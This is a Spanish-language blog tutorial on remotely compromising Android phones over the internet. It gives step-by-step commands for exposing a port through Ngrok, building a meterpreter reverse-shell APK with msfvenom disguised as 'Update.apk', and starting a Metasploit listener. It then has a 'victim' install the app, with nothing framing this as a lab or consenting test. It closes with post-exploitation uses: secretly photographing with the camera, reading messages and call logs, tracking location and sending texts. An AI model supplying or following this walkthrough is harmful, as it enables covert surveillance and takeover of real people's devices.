Hackeando dispositivos Android [Remotamente]

Hackeando sobre WAN

Puedes ver mi Video-tutorial en youtube aquí:
https://youtu.be/Bbp-AcejtHI

Normalmente en WAN, primero necesitas tener una IP/Hostname estático y segundo, necesitas hacer Port Forwarding para permitir tu transmisión de tráfico, y todos sabemos que ambos son tan difíciles en tiempo real ya que tenemos acceso limitado a los puertos en una red.

Así que, lo que vamos a hacer en este escenario, vamos a configurar un túnel seguro utilizando Ngrok.

Ngrok es un sistema de proxy inverso de túneles que establece túneles desde el punto final público, es decir, un Internet a un servicio de red que se ejecuta localmente. Esto puede ayudarnos a crear una URL HTTP/HTTPS pública para un sitio web que se ejecuta localmente en nuestra máquina. No tenemos que hacer ningún tipo de reenvío de puertos durante el uso de Ngrok y nuestro servicio de red finalmente se expondrá a la Internet con la ayuda de TCP tunneling.

Siga estos pasos para proceder:

Paso1: Registro de la cuenta Ngrok para descargarlo.

En primer lugar, usted tendrá que registrarse para la cuenta Ngrok, después de que se le pedirá a la ventana de descarga.

Ventana de registro de Ngrok

Después de registrarse, puede descargar el Ngrok para su sistema Linux.

Simplemente descomprime el archivo descargado.

Paso 2: Conecta tu cuenta

La ejecución de este comando añadirá tu auth token al archivo de configuración por defecto ngrok.yml. Esto le dará acceso a más funciones y a tiempos de sesión más largos. (Tienes que copiar y pegar tu propio token aquí proporcionado en la pantalla de inicio de ngrok después de iniciar sesión)

./ngrok authtoken <tu token>

Ahora estás listo para usar esta herramienta. Abre tu terminal, muévete al directorio donde has extraído la herramienta Ngrock y escribe:

./ngrok tcp

elige un número de puerto en el que quieras enlazar una conexión (aquí, he elegido 5555 como número de puerto). Y después de pulsar en enter, se mostrará una pantalla como esta.

El reenvío aquí especifica el túnel TCP que ngrok ha creado. La conexión se ha unido al localhost en el puerto 5555. Ahora necesitamos generar un payload malicioso usando msfvenom.

Paso3: Generar Payload

Puedes hacerlo abriendo una nueva Terminal en tu máquina Kali Linux y luego escribiendo el siguiente código.

msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk

Pero recuerda que esta vez es un poco diferente al ataque que realizábamos en la LAN. Aquí en lugar de la dirección IP, tendremos que introducir el enlace Forwarding proporcionado en el ngrok (2.tcp.ngrok.io). Y el número de puerto va a ser 15787. Recuerde que, es importante introducir el mismo número de puerto proporcionado por Ngrok en el reenvío de puertos.

Nota: Si al introducir la dirección IP como 2.tcp.ngrok.io no funciona, puede sustituirla por una dirección IP que puede obtener mediante el comando «ping».
Abra un terminal y escriba ping 2.tcp.ngrok.io y pulse enter. Obtendrás una dirección IP que tienes que poner en el lugar de LHOST.

Aquí, he utilizado «Update.apk» como nombre de archivo para nuestro payload. Este archivo se instalará en el dispositivo Android de nuestro objetivo. Pero antes de instalar este archivo, tenemos que configurar nuestro listener. Para ello, siga el paso 4.

Paso 4: Configurar un Listener

Abre tu terminal y carga la consola de Metasploit, escribiendo: msfconsole
Después de que cargue (tras unos segundos), carga el exploit multi-handler escribiendo:

use exploit/multi/handler

Ahora configure una carga útil inversa escribiendo:

set payload android/meterpreter/reverse_tcp

Establezca su LHOST como 0.0.0.0 y LPORT como 5555
(El número de puerto debe ser el mismo que el número de puerto que se utilizó para enlazar la conexión en el ngrok)

set LHOST 0.0.0.0
set LPORT 5555

Finalmente, escribe exploit para iniciar el listener.

El modo de escucha está activado

Paso 5: Instalar el archivo Malicious Update.apk en el dispositivo del objetivo

Deja que la víctima instale la app, y ejecútala en cuanto se instale. Cuando la víctima toque la opción de abrir la aplicación, tendrá acceso a todas las funciones del dispositivo androide. Sin embargo, nada se mostrará en la pantalla del dispositivo después de la aplicación se abre.

Post-Explotación

Tipo de ayuda para ver las diversas opciones que puede utilizar para realizar las diferentes tareas en el dispositivo de la víctima.
Puede acceder a su cámara y tomar una foto sin notificarles. Puedes comprobar sus mensajes, registros de llamadas y guardarlos en tu sistema también.
También puedes ver y abrir cualquier aplicación instalada en su dispositivo. Incluso puedes obtener las coordenadas de la ubicación actual del usuario.
También puedes enviar mensajes a cualquier número de contacto a través de su dispositivo.

Deja una respuesta

Tu dirección de correo electrónico no será publicada.